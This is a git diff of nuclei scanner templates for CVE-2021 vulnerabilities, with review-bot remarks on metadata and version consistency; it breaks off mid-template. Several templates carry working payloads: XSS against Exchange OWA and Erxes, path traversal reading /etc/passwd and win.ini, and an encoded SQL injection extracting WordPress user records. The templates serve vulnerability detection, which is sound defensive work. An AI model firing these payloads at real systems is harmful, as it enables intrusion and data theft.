CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 6.5 cve-id: CVE-2021-31195 cwe-id: CWE-79 + epss-score: 0.92095 + epss-percentile: 0.98883 + cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: + max-request: 1 + vendor: microsoft + product: exchange_server shodan-query: http.title:"Outlook" - tags: microsoft,exchange,owa,xss + tags: cve2021,cve,microsoft,exchange,owa,xss -requests: +http: - method: GET path: - '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//' 
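Review bot: The added `cpe` line in the `@@ -3,23 +3,34 @@` hunk pins `exchange_server:2013:cumulative_update_23`, while the template name, description and shodan query describe Exchange Server/OWA generically; if the advisory covers more than this single cumulative update, the CPE understates the affected set, and the `vendor`/`product` pair already carries the generic identity. Consider `cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*`, or note in the template why one CU is named. The severity and CVSS change to 6.5 is consistent with the new vector on the line above it and needs no change.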
@@ -32,13 +43,12 @@ requests: - 'mail/bootr.ashx' condition: and - - type: status - status: - - 500 - - type: word + part: header words: - "text/html" - part: header -# Enhanced by cs 09/23/2022 + - type: status + status: + - 500 +# digest: 4a0a00473045022100add3f33b9d2e9d57977208908f642566e5d796379120daba28b5ee7685d38b7702204fc9e494046fce48f88b428f7fc426ddca6906f03364c55c0ca03adc357c0660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-31755.yaml b/nuclei-templates/CVE-2021/CVE-2021-31755.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-31755.yaml rename to nuclei-templates/CVE-2021/CVE-2021-31755.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-31800.yaml b/nuclei-templates/CVE-2021/CVE-2021-31800.yaml deleted file mode 100644 index 39813aec4d..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-31800.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: CVE-2021-31800 -info: - name: impacket directory traversal - author: geeknik - description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key. - reference: https://github.com/SecureAuthCorp/impacket/commit/49c643bf66620646884ed141c94e5fdd85bcdd2f - severity: high - tags: impacket,cve,cve2021,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:[x*]:0:0:" diff --git a/nuclei-templates/CVE-2021/CVE-2021-31805.yaml b/nuclei-templates/CVE-2021/CVE-2021-31805.yaml index 2394432a9e..8b70dbaa8d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-31805.yaml 
+++ b/nuclei-templates/CVE-2021/CVE-2021-31805.yaml @@ -1,5 +1,4 @@ id: CVE-2021-31805 - info: name: Apache Struts2 S2-062 - Remote Code Execution author: taielab @@ -16,7 +15,6 @@ info: cve-id: CVE-2021-31805 cwe-id: CWE-917 tags: cve,cve2021,apache,rce,struts,struts2 - requests: - raw: - | @@ -41,7 +39,6 @@ requests: } ------WebKitFormBoundaryl7d1B1aGsV2wcZwF— - matchers: - type: regex part: body diff --git a/nuclei-templates/CVE-2021/cve-2021-32618.yaml b/nuclei-templates/CVE-2021/CVE-2021-32618.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-32618.yaml rename to nuclei-templates/CVE-2021/CVE-2021-32618.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-32682.yaml b/nuclei-templates/CVE-2021/CVE-2021-32682.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-32682.yaml rename to nuclei-templates/CVE-2021/CVE-2021-32682.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-32789.yaml b/nuclei-templates/CVE-2021/CVE-2021-32789.yaml index 0ca835d4dd..c81574a4a4 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-32789.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-32789.yaml 
@@ -6,6 +6,10 @@ info: severity: high description: | woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system. + remediation: | + Update WooCommerce Blocks to version 5.6 or later to mitigate the vulnerability. reference: - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx @@ -17,9 +21,17 @@ info: cvss-score: 7.5 cve-id: CVE-2021-32789 cwe-id: CWE-89 - tags: cve,cve2021,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan + epss-score: 0.09336 + epss-percentile: 0.94559 + cpe: cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: automattic + product: woocommerce_blocks + framework: wordpress + tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic -requests: +http: - method: GET path: - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' 
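Review bot: The added `remediation` tells users to update to "version 5.6 or later", while the `description` in the same hunk states that patches start with 2.5.16 and the new `cpe` has no version bound; the two statements should agree. If 5.6 is not traceable to the listed references, `Update WooCommerce Blocks to version 2.5.16 or later to mitigate the vulnerability.` matches the description.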
@@ -42,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/21 +# digest: 4a0a00473045022100b54f8925ab16f82ba44c482f52bbf32655fb597eb5e2db8ad27f277ea244319802200a1c5a6db552aab8186869b0a59c19879ec2a61824d28b7674831cdeca90ecaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-32853.yaml b/nuclei-templates/CVE-2021/CVE-2021-32853.yaml index 66208ed18d..5c5fd48f84 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-32853.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-32853.yaml 
@@ -1,20 +1,35 @@ id: CVE-2021-32853 info: - name: Erxes <= v0.23.0 XSS + name: Erxes <0.23.0 - Cross-Site Scripting author: dwisiswant0 - severity: medium - description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag. + severity: critical + description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to Erxes version 0.23.0 or later to mitigate the vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ - https://nvd.nist.gov/vuln/detail/CVE-2021-3285 - metadata: - shodan-query: http.title:"erxes" + - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/views/widget.ejs#L14 + - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/index.ts#L54 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.6 cve-id: CVE-2021-32853 - tags: cve,cve2021,xss,erxes,oss + cwe-id: CWE-79 + epss-score: 0.01224 + epss-percentile: 0.83856 + cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: erxes + product: erxes + shodan-query: http.title:"erxes" + tags: cve2021,cve,xss,erxes,oss -requests: +http: - method: GET path: - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" 
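Review bot: The unchanged NVD reference `https://nvd.nist.gov/vuln/detail/CVE-2021-3285` points to a different CVE than `cve-id: CVE-2021-32853`; the trailing digit is missing and the commit rewrites the surrounding lines without fixing it, so it should become `- https://nvd.nist.gov/vuln/detail/CVE-2021-32853`. Separately, the hunk raises `severity` from medium to critical with a 9.6 vector (`S:C/C:H/I:H/A:H`) for a reflected XSS; the vector is internally consistent with the score, but it is unusually high for this class and worth confirming against the NVD entry rather than inheriting it.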
@@ -36,3 +51,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502207aed0ce8a782de56c716be549d8c4fa15f2cbf9113c348db56bdfc9910776782022100a891ca50a47ab7c7ce36f2e1498bb7e8f44b168bfecfb59396015929d2525eb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-3297.yaml b/nuclei-templates/CVE-2021/CVE-2021-3297.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-3297.yaml rename to nuclei-templates/CVE-2021/CVE-2021-3297.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-33044.yaml b/nuclei-templates/CVE-2021/CVE-2021-33044.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-33044.yaml rename to nuclei-templates/CVE-2021/CVE-2021-33044.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-33357.yaml b/nuclei-templates/CVE-2021/CVE-2021-33357.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-33357.yaml rename to nuclei-templates/CVE-2021/CVE-2021-33357.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-33690.yaml b/nuclei-templates/CVE-2021/CVE-2021-33690.yaml index 292022e8fb..ab06b3d302 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-33690.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-33690.yaml @@ -12,13 +12,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-33690 - https://launchpad.support.sap.com/#/notes/3072955 - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806 + - https://github.com/redrays-io/CVE-2021-33690 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2021-33690 cwe-id: CWE-918 - epss-score: 0.37614 - epss-percentile: 0.96834 + epss-score: 0.3856 + epss-percentile: 0.97133 cpe: cpe:2.3:a:sap:netweaver_development_infrastructure:7.11:*:*:*:*:*:*:* metadata: verified: true 
@@ -26,7 +27,7 @@ info: vendor: sap product: netweaver_development_infrastructure shodan-query: html:"SAP NetWeaver" - tags: cve,cve2021,oast,ssrf,sap + tags: cve2021,cve,oast,ssrf,sap http: - raw: @@ -48,5 +49,4 @@ http: part: body words: - "Could not connect to the CBS" - -# digest: 4b0a004830460221008fc4945456a666c784af703474f476468e99fa0d875a4ae8dca7616c4a32274e022100f054941861c0c47bbfaf03d49a3e10862981678a60f637df117abb5e34d58028:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022027727d913e7044670a5cfc2a318a45aac111b189bee52347b9a90933cf5c801b022011d1873dee71de17c4f6b36800ac5b17f4129ced9b5bba0e86ef087c08c08dd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-3377.yaml b/nuclei-templates/CVE-2021/CVE-2021-3377.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-3377.yaml rename to nuclei-templates/CVE-2021/CVE-2021-3377.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-33851.yaml b/nuclei-templates/CVE-2021/CVE-2021-33851.yaml index 8022781c06..eae0b6e411 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-33851.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-33851.yaml 
@@ -6,21 +6,33 @@ info: severity: medium description: | WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts in the context of the victim's browser. + remediation: | + Update to the latest version of the WordPress Customize Login Image plugin (3.5.3) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203 - https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html - https://wordpress.org/plugins/customize-login-image/ - https://nvd.nist.gov/vuln/detail/cve-2021-33851 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-33851 cwe-id: CWE-79 + epss-score: 0.00069 + epss-percentile: 0.2831 + cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss + verified: true + max-request: 4 + vendor: apasionados + product: customize_login_image + framework: wordpress + tags: cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -28,39 +40,33 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=&cli_logo_file=&cli_login_background_color=&cli_custom_css= - - | GET /wp-login.php HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - req-condition: true matchers: - type: dsl dsl: - 'status_code_4 == 200' - - 'contains(all_headers_4, "text/html")' + - 'contains(header_4, "text/html")' - 'contains(body_4, "Go to ")' condition: and extractors: - type: regex name: nonce - part: body group: 1 regex: - 'name="_wpnonce" value="([0-9a-zA-Z]+)"' internal: true - -# Enhanced by md on 2022/12/08 + part: body +# digest: 490a004630440220098b618e64216cc6e575a474182053eae704f5b3d91f98e7851d52a79480d57002207755a534f0e8813a54b102ebe3fb5b8a4f145c17ff32468ab7f25305f3536832:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-34640.yaml b/nuclei-templates/CVE-2021/CVE-2021-34640.yaml new file mode 100644 index 0000000000..7dd6ecef37 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-34640.yaml 
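Review bot: The hunk drops `cookie-reuse: true` and `req-condition: true` from a four-step authenticated flow, so the login cookie carrying over to requests 2–4 and the `status_code_4`/`header_4`/`body_4` DSL now depend on engine defaults; presumably this targets a nuclei release where both are implicit, but the template carries no minimum-version marker, so on an older engine the later requests would run unauthenticated and the matcher would silently fail. The same removal of `cookie-reuse: true` appears in the CVE-2021-34643 hunk at `@@ -25,12 +40,10 @@`. If the change is intentional, a one-line comment near `http:` stating the engine behaviour relied on (`# cookie reuse across raw requests is the engine default`) would make the dependency explicit.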
@@ -0,0 +1,61 @@ +id: CVE-2021-34640 + +info: + name: WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: WordPress Securimage-WP-Fixed plugin 3.5.4 and prior contains a cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file, which allows attackers to inject arbitrary web scripts. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update the Securimage-WP-Fixed plugin to version 3.5.4 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34640 + - https://plugins.trac.wordpress.org/browser/securimage-wp-fixed/trunk/securimage-wp.php#L628 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34640 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-34640 + cwe-id: CWE-79 + epss-score: 0.00116 + epss-percentile: 0.45185 + cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: securimage-wp-fixed_project + product: securimage-wp-fixed + framework: wordpress + tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,securimage-wp-fixed_project + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET //wp-admin/options-general.php/">/script%3E?page=securimage-wp-options%2F HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' 
+ + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100f71f4027e35181f2336f1a5f0c7fa04fd40c25ca4ea1749124253649571d1d09022100a95ccf3acc3d6ad779d55f0e9ae4ce0735927cbfd3a5aa7f9b2350c68169ee4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-34643.yaml b/nuclei-templates/CVE-2021/CVE-2021-34643.yaml index 53d1f872e4..8dfd2c16cb 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-34643.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-34643.yaml 
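Review bot: The `remediation` says to update to "version 3.5.4 or later", but `name` (`<=3.5.4`) and `description` ("3.5.4 and prior") mark 3.5.4 itself as vulnerable, so the advice points at an affected release; either name the fixed version from the references or phrase it as a version later than 3.5.4. The `tags` line also lacks `xss` even though `cwe-id: CWE-79` is set and the sibling CVE-2021-34643 template in this commit carries it: `tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,xss,securimage-wp-fixed_project`. As rendered here the first body matcher is `words: - ''`, an empty string that would match any response; that is probably an artefact of markup being stripped from the payload, but the committed file should be checked.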
@@ -1,21 +1,36 @@ id: CVE-2021-34643 info: - name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting + name: WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting author: dhiyaneshDK severity: medium - description: The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2. + description: WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. + remediation: | + Update to the latest version of WordPress Skaut Bazar plugin (1.3.3) or apply the vendor-provided patch to fix the XSS vulnerability. 
reference: - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34643 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34643 + - https://plugins.trac.wordpress.org/browser/skaut-bazar/tags/1.3.2/skaut-bazar.php#L657 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34643 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-34643 cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated + epss-score: 0.00116 + epss-percentile: 0.44405 + cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: skaut-bazar_project + product: skaut-bazar + framework: wordpress + tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,skaut-bazar_project,xss -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -25,12 +40,10 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/options-general.php//?page=skatubazar_option HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -38,11 +51,12 @@ requests: words: - "" - - type: status - status: - - 200 - - type: word part: header words: - "text/html" + + - type: status + status: + - 200 +# digest: 490a0046304402206d3a11c0c355a2d754828a3bf9cb67c195bd89e335c164e6c70ff16f69226d9202202f501c665407d0e31660af7d953a8a91410f52a5b28a21f28bf895b7b18f7977:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-35250.yaml b/nuclei-templates/CVE-2021/CVE-2021-35250.yaml index 322a695f4f..2f70ac4c8c 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-35250.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-35250.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further attacks. remediation: Resolved in Serv-U 15.3 Hotfix 1. reference: - https://github.com/rissor41/SolarWinds-CVE-2021-35250 @@ -18,15 +20,15 @@ info: cvss-score: 7.5 cve-id: CVE-2021-35250 cwe-id: CWE-22 - epss-score: 0.05691 - epss-percentile: 0.92524 + epss-score: 0.05835 + epss-percentile: 0.93245 cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:* metadata: max-request: 1 vendor: solarwinds product: serv-u shodan-query: product:"Rhinosoft Serv-U httpd" - tags: cve,cve2021,solarwinds,traversal + tags: cve2021,cve,solarwinds,traversal http: - raw: @@ -47,4 +49,4 @@ http: - type: status status: - 401 -# digest: 4a0a00473045022100d68d60608d08e485d8a281248055456c1c4a3dd5e09078b5550f64c944dcf1500220137cfd15836fea3be79e6bc7bb265863fb925f6d82c653967abdb563b88c9171:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200620000d186c36d678271b33d3f8ab02fa3ece06cd95c0344ba841a95c9659f802201309537d97e91561f1fd81ac4850c36eca8c4bf67806545f58635619957ea31a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-35323.yaml b/nuclei-templates/CVE-2021/CVE-2021-35323.yaml index b7197db878..d021d01f7b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-35323.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-35323.yaml 
@@ -16,7 +16,7 @@ info: cve-id: CVE-2021-35323 cwe-id: CWE-79 epss-score: 0.00183 - epss-percentile: 0.55492 + epss-percentile: 0.55601 cpe: cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:* metadata: verified: true @@ -24,7 +24,7 @@ info: vendor: bludit product: bludit shodan-query: title:"Bludit" - tags: cve,cve2021,bludit,xss + tags: cve2021,cve,bludit,xss http: - raw: @@ -56,4 +56,4 @@ http: regex: - 'type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*)"' internal: true -# digest: 4a0a0047304502203d8207daffbe09abc286d385b724dedd353d2a20f0705d03996c581d35f64fc6022100d8b0566813d6a27366e774ead09faec475991ef1982b8d1619e3d07bd48bdfd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022032cea10cfe2c27c8f06a3a4d1af7a5f3386caf73473c6483fd0df3b4bea40945022100919da458a0416cd6205d3f542c2f118ce6764e45d01de619621fb1db132866e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-35380.yaml b/nuclei-templates/CVE-2021/CVE-2021-35380.yaml index f417f382fc..b596169069 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-35380.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-35380.yaml 
@@ -6,18 +6,31 @@ info: severity: high description: | TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of TermTalk Server. reference: - https://www.swascan.com/solari-di-udine/ - https://www.exploit-db.com/exploits/50638 - https://nvd.nist.gov/vuln/detail/CVE-2021-35380 + - https://www.swascan.com/it/security-blog/ + - https://github.com/anonymous364872/Rapier_Tool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-35380 cwe-id: CWE-22 - tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb + epss-score: 0.23467 + epss-percentile: 0.96147 + cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: solari + product: termtalk_server + tags: cve2021,cve,termtalk,lfi,unauth,lfr,edb,solari -requests: +http: - method: GET path: - "{{BaseURL}}/file?valore=../../../../../windows/win.ini" @@ -30,5 +43,4 @@ requests: - "fonts" - "extensions" condition: and - -# Enhanced by mp on 2023/01/15 +# digest: 490a0046304402201049687d7055f539322e4410a7114608b1866683ac30c589fc9f8b1207b39bac022031fcf5d29996d0c09d94724b89f5f871ca1112d0c801d367951c80f2f395de11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-35395.yaml b/nuclei-templates/CVE-2021/CVE-2021-35395.yaml index 649cf5e26e..b585dcd25f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-35395.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-35395.yaml 
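Review bot: The added reference `https://www.swascan.com/it/security-blog/` is a blog index rather than an advisory for this CVE, and the existing `https://www.swascan.com/solari-di-udine/` already covers the vendor write-up, so the index link should be dropped or replaced with the specific post. The added `remediation` is generic ("apply the latest patch") while `cpe` pins 3.24.0.2 exactly; if the exploit-db or swascan references name a fixed build, state it.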
@@ -17,13 +17,13 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35395 epss-score: 0.97119 - epss-percentile: 0.99731 + epss-percentile: 0.99744 cpe: cpe:2.3:a:realtek:realtek_jungle_sdk:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: realtek product: realtek_jungle_sdk - tags: cve,cve2021,realtek,rce,kev + tags: cve2021,cve,realtek,rce,kev http: - raw: @@ -45,4 +45,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4b0a00483046022100cbcd3f563e1f116189e8e2abdfc08c9a4e5984d9129cf5a795a5df5e09fce7bd022100df12ee5a37701340c9dd9549823f71eb474c62a773412804f3a53bb4e56f9284:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f282350954f899ddbf62874c49a1c8297dfe332dae61b46c09d5fce43904bf4022100861f33e914b3543cccbec18fe3c283f7a6a028d5f52c9691c9f397c000c41ddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-35488.yaml b/nuclei-templates/CVE-2021/CVE-2021-35488.yaml index 7f2146bdea..bb60f03561 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-35488.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-35488.yaml 
@@ -6,21 +6,33 @@ info: severity: medium description: | Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of Thruk or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://www.gruppotim.it/redteam - https://www.thruk.org/changelog.html - https://nvd.nist.gov/vuln/detail/CVE-2021-35488 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: 